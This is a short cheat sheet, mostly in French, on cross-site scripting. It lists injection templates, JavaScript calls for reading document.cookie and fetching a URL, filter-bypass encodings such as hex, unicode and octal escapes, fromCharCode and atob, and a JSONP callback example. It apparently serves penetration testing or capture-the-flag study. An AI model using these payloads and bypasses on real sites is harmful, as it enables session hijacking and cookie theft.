Template
<script>alert(1)</script>
<img src=x onerror=alert(1) />
<svg onload=alert('XSS')>
Fonctions JS
btoa() //method encodes a string in base-64.
atob() //method to decode a base-64 encoded string.
document.getElementById(id)
document.getElementsByClassName(names)
document.getElementsByName(name) //for inputs
window.location.replace('<url>')
window.location.href='<url>'
document.cookie
document['cookie']
fetch("<url>")
'hello'.concat('','world')
'hello'.slice(0,2)
`cookie : ${document.cookie}`
Contournement de filtre
<iMg>
<[%00]img>
\u0061lert(1)
alert`1`
"hack"
'hack'
`hack`
"\h\a\c\k\" // some chars are not working
"\x68\x61\x63\x6b" // hex
"\u0068\u0061\u0063\u006b" // unicode
"\150\141\143\153" // charcode base 8
/hack/
/hack/.source
String.fromCharCode(104,97,99,107) // charcode base 10
atob("aGFjaw==")
<script ///Note the newline
>alert(1)</script>
Exemple
JSONP
http://lun.org/page?p=<script>src="https://content-customsearch.googleapis.com/customsearch/v1?q=hello&callback=<javascript>"></script>
Liens utiles
Sources :